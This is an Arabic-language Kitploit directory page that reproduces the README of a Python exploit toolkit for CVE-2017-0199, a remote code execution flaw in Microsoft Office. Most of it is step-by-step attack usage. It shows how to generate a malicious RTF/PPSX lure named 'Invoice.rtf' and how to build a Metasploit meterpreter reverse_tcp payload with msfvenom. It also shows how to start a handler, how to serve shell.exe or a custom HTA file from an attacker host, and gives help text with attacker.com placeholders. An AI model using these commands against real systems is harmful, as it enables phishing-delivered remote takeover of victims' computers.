Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-0199 — نص برمجي بلغة بايثون لإنشاء ملفات RTF/PPSX خبيثة تستغل الثغرة CVE-2017-0199 لتنفيذ أكواد عن بعد، وتوصيل حمولات Metasploit أو حمولات مخصصة بأقل قدر من التهيئة. | Kitploit
أدوات/GitHubGitHub/likekabin/cve-2017-0199
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHublikekabin/cve-2017-0199

CVE-2017-0199

نص برمجي بلغة بايثون لإنشاء ملفات RTF/PPSX خبيثة تستغل الثغرة CVE-2017-0199 لتنفيذ أكواد عن بعد، وتوصيل حمولات Metasploit أو حمولات مخصصة بأقل قدر من التهيئة.

عرض المستودع
منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 4.0

مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 4.0 هي سكريبت بايثون عملي يوفر لمختبرِي الاختراق والباحثين في مجال الأمن طريقة سريعة وفعالة لاختبار تنفيذ الأوامر عن بُعد (RCE) في Microsoft Office. يمكن لهذه الأداة إنشاء ملف RTF/PPSX خبيث وتوصيل حمولة metasploit / meterpreter / أي حمولة أخرى للضحية دون أي إعدادات معقدة.

إخلاء مسؤولية

هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو إساءة استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.

أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأغراض سيئة!

الترخيص

رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

ملاحظة الإصدار:

تم إدخال الإمكانيات التالية إلى السكريبت

root@kitploit:~
- إنشاء ملف PPSX خبيث
- وضع الاستغلال للملف PPSX الذي تم إنشاؤه
- تحديث ملف template.ppsx

الإصدار: بايثون إصدار 2.7.13

السيناريو 1: توصيل حمولة محلية

أمثلة الأوامر
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (اختياري، إذا كنت تستخدم حمولة MSF): إنشاء حمولة metasploit وبدء المعالج
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل حمولة محلية
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
مخطط التسلسل

alt tag

السيناريو 2: توصيل حمولة عن بُعد

أمثلة الأوامر
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل حمولة عن بُعد
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
مخطط التسلسل

alt tag

السيناريو 3: توصيل ملف HTA مخصص

أمثلة الأوامر
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) بدء مجموعة الأدوات في وضع الاستغلال لتوصيل ملف HTA مخصص
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
مخطط التسلسل

alt tag

وسائط سطر الأوامر:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

هذه مجموعة أدوات مفيدة لاستغلال CVE-2017-0199 (تنفيذ الأوامر عن بُعد في Microsoft Office)

الأوضاع:

-M gen                                          إنشاء ملف خبيث فقط

     إنشاء ملف RTF/PPSX خبيث:

      -w <Filename.rtf/Filename.ppsx>     اسم ملف RTF/PPSX الخبيث (شارك هذا الملف مع الضحية).

      -u <http://attacker.com/test.hta>   المسار إلى ملف HTA/SCT. عادةً، يجب أن يكون هذا نطاقًا أو عنوان IP حيث تعمل هذه الأداة.
                                      على سبيل المثال، http://attackerip.com/test.doc (سيتم تضمين عنوان URL هذا في ملف RTF/PPSX الخبيث وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الخبيث).
      -t RTF|PPSX (افتراضي = RTF)         نوع الملف المراد إنشاؤه.
      -x 0|1  (افتراضي = 0)               إنشاء ملف RTF مشوش. 0 = تعطيل، 1 = تفعيل.

				      
-M exp                                          بدء وضع الاستغلال

     الاستغلال:
 
      -t RTF|PPSX (افتراضي = RTF)         نوع الملف المراد استغلاله.
      -H </tmp/custom>                المسار المحلي لملف HTA/SCT مخصص والذي يجب توصيله وتنفيذه على الجهاز الهدف.
                                          ملاحظة: هذا الخيار لن يقوم بتوصيل الحمولات المحددة عبر الخيارين "-e" و "-l"
					  
      -p <TCP port:Default 80>            رقم المنفذ المحلي.

      -e <http://attacker.com/shell.exe>  المسار إلى ملف تنفيذي / شيل meterpreter / حمولة يجب تنفيذها على الجهاز الهدف.

      -l </tmp/shell.exe>                 إذا كانت الحمولة مستضافة محليًا، حدد المسار المحلي للملف التنفيذي / شيل meterpreter / الحمولة.

الإشادة

@nixawk لعينة RTF، @Li Haifei، @bhdresh

الأخطاء والمشكلات وطلبات الميزات

من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض المشكلات

يرجى الإبلاغ عن الأخطاء والمشكلات عبر https://github.com/bhdresh/CVE-2017-0199/issues/new

تنزيل الأداة